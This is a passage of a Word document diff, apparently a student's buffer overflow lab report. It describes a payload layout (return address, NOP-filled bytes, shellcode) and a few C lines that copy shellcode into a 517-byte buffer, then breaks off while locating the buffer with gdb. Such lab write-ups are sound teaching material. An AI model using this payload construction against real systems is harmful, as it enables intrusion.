+        <w:t xml:space="preserve"> overflow buffer like:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a7"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4621"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4621" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>1.Address of shellcode (high address)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4621" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>F</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>illed bytes</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4621" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>3.Shellcode (low address)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Thanks to Sara that she helped us finish the part 2 “Filled bytes” by “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>memset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the buffer array with several “</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>NOP”s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">we only need to do the rest. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>o firstly, I filled the end of the buffer with the shellcode, which is much easier than part 1.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeSize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeSize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">buffer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hen in part 1, we have 2 main questions:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(1) what is the address of shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(2) where should it be put in the buffer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1) To find the address of buffer array, it is nature to use the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell function.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62A43CF7" wp14:editId="530038D4">
+            <wp:extent cx="5274310" cy="1010920"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="9" name="图片 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1010920"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
